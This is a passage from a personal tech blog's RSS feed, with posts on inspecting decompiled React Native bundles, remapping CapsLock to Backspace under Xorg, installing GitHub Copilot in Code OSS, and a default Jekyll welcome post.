&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;what you get in &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;file_output.js&lt;/code&gt; is a decompiled version of a bundle file. Go and explore it! Don’t expect to have a nice and clean code. What’s going to be inside is much better, but function/variable names like &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;a,b,c,d,e,..&lt;/code&gt; doesn’t help. I can give you the last advice. Check the app you just decompiled and looks for keywords/strings near data which you want to get. For example you may want a data from a certain screen, but this screen comes with a header/title at the very top like “How to spot summer clouds?”. Looks for it 🙂 Searching for some logic may start the same (popup blocking a “premium”? hehe), but it’s going to be a little bit harder to find 🙂&lt;/p&gt;

&lt;p&gt;To sum things up, I personally use this to check if app data is pulled from some kind of server or just hardcoded in the app. It may be faster than tunneling your network data (which is usually encrypted anyway) via &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Burp&lt;/code&gt; or similar tool, especially if you don’t do that every day. Sometimes you can find a hardcoded array of data, or just a plain &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;json&lt;/code&gt; file in a &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;raw&lt;/code&gt; folder 🙂 Have fun playing!&lt;/p&gt;

&lt;!-- &lt;hr style=&quot;margin: 16px 0px 16px 0px&quot; /&gt; --&gt;
&lt;!-- &lt;script
id=&quot;diffblog-plugin-script&quot;
async=&quot;false&quot;
src=&quot;https://diff.blog/static/js/diffblog_plugin_v1.js&quot;
&gt;&lt;/script&gt;
&lt;script&gt;
document
.getElementById(&quot;diffblog-plugin-script&quot;)
.addEventListener(&quot;load&quot;, function () {
DiffBlog(&quot;l1hwfdcilg3r3t2hu2zoqweyod5ktr52272hdhm4rye43zyr1p&quot;);
});
&lt;/script&gt; --&gt;

&lt;script&gt;
  // Set utterances theme based on current theme
  (function () {
    function getUtterancesTheme() {
      var theme = localStorage.getItem(&apos;theme&apos;) || &apos;auto&apos;;
      var utterancesTheme;

      if (theme === &apos;dark&apos;) {
        utterancesTheme = &apos;github-dark&apos;;
      } else if (theme === &apos;light&apos;) {
        utterancesTheme = &apos;github-light&apos;;
      } else {
        // Auto mode - check system preference
        if (
          window.matchMedia &amp;&amp;
          window.matchMedia(&apos;(prefers-color-scheme: dark)&apos;).matches
        ) {
          utterancesTheme = &apos;github-dark&apos;;
        } else {
          utterancesTheme = &apos;github-light&apos;;
        }
      }
      return utterancesTheme;
    }

    var utterancesTheme = getUtterancesTheme();

    var script = document.createElement(&apos;script&apos;);
    script.src = &apos;https://utteranc.es/client.js&apos;;
    script.setAttribute(&apos;repo&apos;, &apos;robi24/robi24.github.io&apos;);
    script.setAttribute(&apos;issue-term&apos;, &apos;pathname&apos;);
    script.setAttribute(&apos;theme&apos;, utterancesTheme);
    script.setAttribute(&apos;crossorigin&apos;, &apos;anonymous&apos;);
    script.async = true;

    // Listen for utterances ready event
    window.addEventListener(&apos;message&apos;, function (event) {
      if (event.origin !== &apos;https://utteranc.es&apos;) return;

      // When utterances loads, immediately update theme
      var iframe = document.querySelector(&apos;.utterances-frame&apos;);
      if (iframe) {
        var currentTheme = getUtterancesTheme();
        var message = {
          type: &apos;set-theme&apos;,
          theme: currentTheme,
        };
        iframe.contentWindow.postMessage(message, &apos;https://utteranc.es&apos;);
      }
    });

    var container = document.getElementById(&apos;utterances-container&apos;);
    if (container) {
      container.appendChild(script);
    }
  })();
&lt;/script&gt;

&lt;div id=&quot;utterances-container&quot;&gt;&lt;/div&gt;

&lt;script async=&quot;&quot; src=&quot;https://www.googletagmanager.com/gtag/js?id=G-4SN4JSS2WD&quot;&gt;&lt;/script&gt;

&lt;script&gt;
  window.dataLayer = window.dataLayer || [];
  function gtag() {
    dataLayer.push(arguments);
  }
  gtag(&apos;js&apos;, new Date());
  gtag(&apos;config&apos;, &apos;G-4SN4JSS2WD&apos;);
&lt;/script&gt;

</description>
				<pubDate>Sun, 10 Sep 2023 15:40:00 +0000</pubDate>
				<link>https://bitwornhat.com/posts/react-native-app-disassembly</link>
				<guid isPermaLink="true">https://bitwornhat.com/posts/react-native-app-disassembly</guid>
			</item>
		
			<item>
				<title>CapsLock as Backspace or any other key remap guide for linux xorg</title>
				<description>&lt;p&gt;There are so many articles on the web about swapping/remapping keyboard layout. The thing is I found most of them working till reboot, working only on some specific distros, working partially (e.g.: clicking working fine but long press not), or not working at all 🙃 So here it is, the ultimate, 1min (if you’re drinking coffee in the meantime and don’t want to spill some on your super fancy and expensive keyboard ☕), copy paste solution to make &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;CapsLock&lt;/code&gt; work as a &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Backspace&lt;/code&gt; 🎉 Or whatever key you want to swap/remap, you just need to know the right key name (&lt;a href=&quot;https://superuser.com/a/1461427&quot;&gt;how to get a list of valid x11 names&lt;/a&gt;).&lt;/p&gt;

&lt;p&gt;Let’s start with some intro. I should tell you earlier that you need to use &lt;a href=&quot;https://wiki.archlinux.org/title/Xorg/Keyboard_configuration&quot;&gt;Xorg&lt;/a&gt;. If you’re a &lt;a href=&quot;https://wayland.freedesktop.org/&quot;&gt;Wayland&lt;/a&gt; user I can only share this &lt;a href=&quot;https://unix.stackexchange.com/a/526192&quot;&gt;link&lt;/a&gt; and wish you luck 🤞 (just kidding, the solution from &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Tony Beta Lambda&apos;s&lt;/code&gt; should work just fine). Ok, back to the topic. The &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Xorg&lt;/code&gt; server uses the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;X&lt;/code&gt; keyboard extension (&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;XKB&lt;/code&gt;) to define keyboard layouts, but where are we going to find the right layout file we need to update? It’s under &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;X11&lt;/code&gt; folder. What’s &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;X11&lt;/code&gt;? It’s a protocol to handle drawing on a display and sending input events (keyboard/mouse clicks movements). To sum things up, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Xorg&lt;/code&gt; is a server/application which uses &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;X11&lt;/code&gt; protocol. That’s why &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;xkb&lt;/code&gt; is inside the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;X11&lt;/code&gt; folder. You can learn a lot just by looking at a file path, don’t you? 😉&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;
    &lt;p&gt;Open your &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;X11/xkb/symbols/pc&lt;/code&gt; file with the rights to edit.&lt;/p&gt;

    &lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nb&quot;&gt;sudo &lt;/span&gt;gedit /usr/share/X11/xkb/symbols/pc
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;    &lt;/div&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Find a &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;key &amp;lt;CAPS&amp;gt;&lt;/code&gt; part and replace the second part of it with &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;BackSpace&lt;/code&gt;. That’s how this line should look like after editing (reminder: you can update any key you want!).&lt;/p&gt;

    &lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;key &amp;lt;CAPS&amp;gt; &lt;span class=&quot;o&quot;&gt;{[&lt;/span&gt;  BackSpace,  BackSpace  &lt;span class=&quot;o&quot;&gt;]}&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;    &lt;/div&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Clean the cache. We can find it under &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;var/lib/xkb&lt;/code&gt;. The &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;X&lt;/code&gt; server uses this directory to store the compiled version of the current keymap.&lt;/p&gt;

    &lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nb&quot;&gt;sudo rm&lt;/span&gt; &lt;span class=&quot;nt&quot;&gt;-rf&lt;/span&gt; /var/lib/xkb/&lt;span class=&quot;k&quot;&gt;*&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;    &lt;/div&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Reboot your system and enjoy your new ⌨ layout!&lt;/p&gt;
  &lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;It’s worth adding that you may need to repeat this process after updating your system. You may say it’s not the most ultimate solution, and you’re right! Why don’t you share your &lt;em&gt;ultimate&lt;/em&gt; below? 😉&lt;/p&gt;

&lt;!-- &lt;hr style=&quot;margin: 16px 0px 16px 0px&quot; /&gt; --&gt;
&lt;!-- &lt;script
id=&quot;diffblog-plugin-script&quot;
async=&quot;false&quot;
src=&quot;https://diff.blog/static/js/diffblog_plugin_v1.js&quot;
&gt;&lt;/script&gt;
&lt;script&gt;
document
.getElementById(&quot;diffblog-plugin-script&quot;)
.addEventListener(&quot;load&quot;, function () {
DiffBlog(&quot;l1hwfdcilg3r3t2hu2zoqweyod5ktr52272hdhm4rye43zyr1p&quot;);
});
&lt;/script&gt; --&gt;

&lt;script&gt;
  // Set utterances theme based on current theme
  (function () {
    function getUtterancesTheme() {
      var theme = localStorage.getItem(&apos;theme&apos;) || &apos;auto&apos;;
      var utterancesTheme;

      if (theme === &apos;dark&apos;) {
        utterancesTheme = &apos;github-dark&apos;;
      } else if (theme === &apos;light&apos;) {
        utterancesTheme = &apos;github-light&apos;;
      } else {
        // Auto mode - check system preference
        if (
          window.matchMedia &amp;&amp;
          window.matchMedia(&apos;(prefers-color-scheme: dark)&apos;).matches
        ) {
          utterancesTheme = &apos;github-dark&apos;;
        } else {
          utterancesTheme = &apos;github-light&apos;;
        }
      }
      return utterancesTheme;
    }

    var utterancesTheme = getUtterancesTheme();

    var script = document.createElement(&apos;script&apos;);
    script.src = &apos;https://utteranc.es/client.js&apos;;
    script.setAttribute(&apos;repo&apos;, &apos;robi24/robi24.github.io&apos;);
    script.setAttribute(&apos;issue-term&apos;, &apos;pathname&apos;);
    script.setAttribute(&apos;theme&apos;, utterancesTheme);
    script.setAttribute(&apos;crossorigin&apos;, &apos;anonymous&apos;);
    script.async = true;

    // Listen for utterances ready event
    window.addEventListener(&apos;message&apos;, function (event) {
      if (event.origin !== &apos;https://utteranc.es&apos;) return;

      // When utterances loads, immediately update theme
      var iframe = document.querySelector(&apos;.utterances-frame&apos;);
      if (iframe) {
        var currentTheme = getUtterancesTheme();
        var message = {
          type: &apos;set-theme&apos;,
          theme: currentTheme,
        };
        iframe.contentWindow.postMessage(message, &apos;https://utteranc.es&apos;);
      }
    });

    var container = document.getElementById(&apos;utterances-container&apos;);
    if (container) {
      container.appendChild(script);
    }
  })();
&lt;/script&gt;

&lt;div id=&quot;utterances-container&quot;&gt;&lt;/div&gt;

&lt;script async=&quot;&quot; src=&quot;https://www.googletagmanager.com/gtag/js?id=G-4SN4JSS2WD&quot;&gt;&lt;/script&gt;

&lt;script&gt;
  window.dataLayer = window.dataLayer || [];
  function gtag() {
    dataLayer.push(arguments);
  }
  gtag(&apos;js&apos;, new Date());
  gtag(&apos;config&apos;, &apos;G-4SN4JSS2WD&apos;);
&lt;/script&gt;

</description>
				<pubDate>Sun, 28 May 2023 15:00:00 +0000</pubDate>
				<link>https://bitwornhat.com/posts/capslock-to-backspace-key-remapping</link>
				<guid isPermaLink="true">https://bitwornhat.com/posts/capslock-to-backspace-key-remapping</guid>
			</item>
		
			<item>
				<title>Code OSS and Github Copilot, or any other missing extension</title>
				<description>&lt;p&gt;It’s been a while since I started using Manjaro with Code OSS and I love it! Code OSS is fully open source, where Microsoft VS Code comes with an additional &lt;em&gt;closed-source&lt;/em&gt; software. More details &lt;a href=&quot;https://github.com/microsoft/vscode/wiki/Differences-between-the-repository-and-Visual-Studio-Code&quot;&gt;here&lt;/a&gt;, but long story short, because of this difference, we may not be able to install all the extensions directly via the Code OSS (the catch is the &lt;a href=&quot;https://stackoverflow.com/questions/37143536/no-extensions-found-when-running-visual-studio-code-from-source&quot;&gt;product.json&lt;/a&gt; file). &lt;strong&gt;Github Copilot is one of them!&lt;/strong&gt;. Luckily, we can install any extension we want via the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;code&lt;/code&gt; cli command or via &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;CTRL + P&lt;/code&gt;.&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;Since you can no longer download extensions from Visual Studio Marketplace directly, use this &lt;a href=&quot;https://github.gallery.vsassets.io/_apis/public/gallery/publisher/GitHub/extension/copilot/latest/assetbyname/Microsoft.VisualStudio.Services.VSIXPackage&quot;&gt;github copilot download&lt;/a&gt; link. It pulls the latest version. You’ll get a file ending with &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;.vsix&lt;/code&gt;.&lt;/li&gt;
  &lt;li&gt;Use the &lt;a href=&quot;https://code.visualstudio.com/docs/editor/extension-marketplace#_install-from-a-vsix&quot;&gt;cli&lt;/a&gt; or &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;CTRL + Shift+ P&lt;/code&gt; -&amp;gt; &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Extensions: Install from VSIX...&lt;/code&gt; and select GH Copilot file you just downloaded.&lt;/li&gt;
  &lt;li&gt;Run &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Ctrl + Shift+ P&lt;/code&gt; -&amp;gt; &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Preferences: Configure Runtime Arguments&lt;/code&gt; command, and in the JSON file add the following entry: “enable-proposed-api”:[“github.copilot”] (found &lt;a href=&quot;https://github.com/orgs/community/discussions/6629&quot;&gt;here&lt;/a&gt;)&lt;/li&gt;
  &lt;li&gt;Restart Code OSS 😉&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The 3rd step will not be needed in the future when the proposed changes to the Code OSS api will be merged.&lt;/p&gt;

&lt;!-- &lt;hr style=&quot;margin: 16px 0px 16px 0px&quot; /&gt; --&gt;
&lt;!-- &lt;script
id=&quot;diffblog-plugin-script&quot;
async=&quot;false&quot;
src=&quot;https://diff.blog/static/js/diffblog_plugin_v1.js&quot;
&gt;&lt;/script&gt;
&lt;script&gt;
document
.getElementById(&quot;diffblog-plugin-script&quot;)
.addEventListener(&quot;load&quot;, function () {
DiffBlog(&quot;l1hwfdcilg3r3t2hu2zoqweyod5ktr52272hdhm4rye43zyr1p&quot;);
});
&lt;/script&gt; --&gt;

&lt;script&gt;
  // Set utterances theme based on current theme
  (function () {
    function getUtterancesTheme() {
      var theme = localStorage.getItem(&apos;theme&apos;) || &apos;auto&apos;;
      var utterancesTheme;

      if (theme === &apos;dark&apos;) {
        utterancesTheme = &apos;github-dark&apos;;
      } else if (theme === &apos;light&apos;) {
        utterancesTheme = &apos;github-light&apos;;
      } else {
        // Auto mode - check system preference
        if (
          window.matchMedia &amp;&amp;
          window.matchMedia(&apos;(prefers-color-scheme: dark)&apos;).matches
        ) {
          utterancesTheme = &apos;github-dark&apos;;
        } else {
          utterancesTheme = &apos;github-light&apos;;
        }
      }
      return utterancesTheme;
    }

    var utterancesTheme = getUtterancesTheme();

    var script = document.createElement(&apos;script&apos;);
    script.src = &apos;https://utteranc.es/client.js&apos;;
    script.setAttribute(&apos;repo&apos;, &apos;robi24/robi24.github.io&apos;);
    script.setAttribute(&apos;issue-term&apos;, &apos;pathname&apos;);
    script.setAttribute(&apos;theme&apos;, utterancesTheme);
    script.setAttribute(&apos;crossorigin&apos;, &apos;anonymous&apos;);
    script.async = true;

    // Listen for utterances ready event
    window.addEventListener(&apos;message&apos;, function (event) {
      if (event.origin !== &apos;https://utteranc.es&apos;) return;

      // When utterances loads, immediately update theme
      var iframe = document.querySelector(&apos;.utterances-frame&apos;);
      if (iframe) {
        var currentTheme = getUtterancesTheme();
        var message = {
          type: &apos;set-theme&apos;,
          theme: currentTheme,
        };
        iframe.contentWindow.postMessage(message, &apos;https://utteranc.es&apos;);
      }
    });

    var container = document.getElementById(&apos;utterances-container&apos;);
    if (container) {
      container.appendChild(script);
    }
  })();
&lt;/script&gt;

&lt;div id=&quot;utterances-container&quot;&gt;&lt;/div&gt;

&lt;script async=&quot;&quot; src=&quot;https://www.googletagmanager.com/gtag/js?id=G-4SN4JSS2WD&quot;&gt;&lt;/script&gt;

&lt;script&gt;
  window.dataLayer = window.dataLayer || [];
  function gtag() {
    dataLayer.push(arguments);
  }
  gtag(&apos;js&apos;, new Date());
  gtag(&apos;config&apos;, &apos;G-4SN4JSS2WD&apos;);
&lt;/script&gt;

</description>
				<pubDate>Wed, 12 Apr 2023 10:00:00 +0000</pubDate>
				<link>https://bitwornhat.com/posts/code-oss-and-copilot</link>
				<guid isPermaLink="true">https://bitwornhat.com/posts/code-oss-and-copilot</guid>
			</item>
		
			<item>
				<title>Welcome to Jekyll!</title>
				<description>&lt;p&gt;You’ll find this post in your &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;_posts&lt;/code&gt; directory. Go ahead and edit it and re-build the site to see your changes. You can rebuild the site in many different ways, but the most common way is to run &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;jekyll serve&lt;/code&gt;, which launches a web server and auto-regenerates your site when a file is updated.&lt;/p&gt;

&lt;p&gt;Jekyll requires blog post files to be named according to the following format:&lt;/p&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;YEAR-MONTH-DAY-title.MARKUP&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Where &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;YEAR&lt;/code&gt; is a four-digit number, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;MONTH&lt;/code&gt; and &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;DAY&lt;/code&gt; are both two-digit numbers, and &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;MARKUP&lt;/code&gt; is the file extension representing the format used in the file. After that, include the necessary front matter. Take a look at the source for this post to get an idea about how it works.&lt;/p&gt;

&lt;p&gt;Jekyll also offers powerful support for code snippets:&lt;/p&gt;

&lt;figure class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-ruby&quot; data-lang=&quot;ruby&quot;&gt;&lt;span class=&quot;k&quot;&gt;def&lt;/span&gt; &lt;span class=&quot;nf&quot;&gt;print_hi&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nb&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
  &lt;span class=&quot;nb&quot;&gt;puts&lt;/span&gt; &lt;span class=&quot;s2&quot;&gt;&quot;Hi, &lt;/span&gt;&lt;span class=&quot;si&quot;&gt;#{&lt;/span&gt;&lt;span class=&quot;nb&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;si&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;&lt;/span&gt;
&lt;span class=&quot;k&quot;&gt;end&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;print_hi&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;&apos;Tom&apos;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;c1&quot;&gt;#=&amp;gt; prints &apos;Hi, Tom&apos; to STDOUT.&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;

&lt;p&gt;Check out the &lt;a href=&quot;https://jekyllrb.com/docs/home&quot;&gt;Jekyll docs&lt;/a&gt; for more info on how to get the most out of Jekyll. File all bugs/feature requests at &lt;a href=&quot;https://github.com/jekyll/jekyll&quot;&gt;Jekyll’s GitHub repo&lt;/a&gt;. If you have questions, you can ask them on &lt;a href=&quot;https://talk.jekyllrb.com/&quot;&gt;Jekyll Talk&lt;/a&gt;.&lt;/p&gt;

</description>
				<pubDate>Tue, 03 Jan 2023 19:47:52 +0000</pubDate>
				<link>https://bitwornhat.com/posts/jekyll_update</link>
				<guid isPermaLink="true">https://bitwornhat.com/posts/jekyll_update</guid>
			</item>
		
	</channel>
</rss>